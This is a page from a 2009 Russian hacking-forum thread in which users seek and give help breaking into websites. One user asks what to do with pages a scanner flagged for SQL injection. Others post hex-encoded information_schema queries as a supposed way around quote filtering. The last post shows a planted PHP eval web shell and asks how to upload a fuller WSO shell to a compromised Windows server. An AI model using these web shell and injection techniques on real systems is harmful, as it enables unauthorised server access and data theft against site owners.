ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10661  
Старый 09.12.2009, 07:44
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от LokbatanLi  
извините за вопрос ест какой то софт или ехплоит для знать сколько columns
Есть - http://forum.antichat.ru/showthread.php?t=24918
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #10662  
Старый 09.12.2009, 08:24
Аватар для Totgeliebt
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
 
Ответить с цитированием

  #10663  
Старый 09.12.2009, 08:35
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от Totgeliebt  
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!

Статья - http://forum.antichat.ru/threadnav43966-1-40.html

Сканер - rmb -> delete
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #10664  
Старый 09.12.2009, 08:56
Аватар для Totgeliebt
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

Цитата:
Сообщение от Twoster  
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!

Статья - http://forum.antichat.ru/threadnav43966-1-40.html

Сканер - rmb -> delete
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
 
Ответить с цитированием

  #10665  
Старый 09.12.2009, 09:08
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от Totgeliebt  
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
Значит пункт 2 - удалить сканер
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #10666  
Старый 09.12.2009, 12:19
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

2Strilo4ka
так фильтрацию обходить
 
Ответить с цитированием

  #10667  
Старый 09.12.2009, 12:19
Аватар для _gr34t
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
Цитата:
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
Цитата:
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
 
Ответить с цитированием

  #10668  
Старый 09.12.2009, 12:53
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Зачем, если можно
Код:
SELECT table_name FROM information_schema.tables WHERE table_schema=0x666f72756d
?
 
Ответить с цитированием

  #10669  
Старый 09.12.2009, 12:55
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Rubaka  
2Strilo4ka
так фильтрацию обходить
Какую? Фильтрацию чего так можно обойти?
Цитата:
Сообщение от _gr34t  
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
Цитата:
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
Цитата:
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
Господа, если не знаете что ответить или не уверены, не нужно этого делать, я уже по 100 раз всех просил об этом.

========================

Strilo4ka
Это делается для получения результата в "правильной" кодировке, и никакую фильтрацию это обойти не позволит. Ты наконец прочитаешь хоть какую-нибудь статью, или так и будет это продолжаться?
 
Ответить с цитированием

  #10670  
Старый 09.12.2009, 17:28
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
OC win , стоит VertrigoServ

Почему то я замешкался вот тут:
confgs.php?e=ls; не выводит список файлов
confgs.php?e=pwd; тож нехочет показывать, но показывает phpinfo()
confgs.php?e=phpinfo();

Последний раз редактировалось SeNaP; 09.12.2009 в 17:35..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ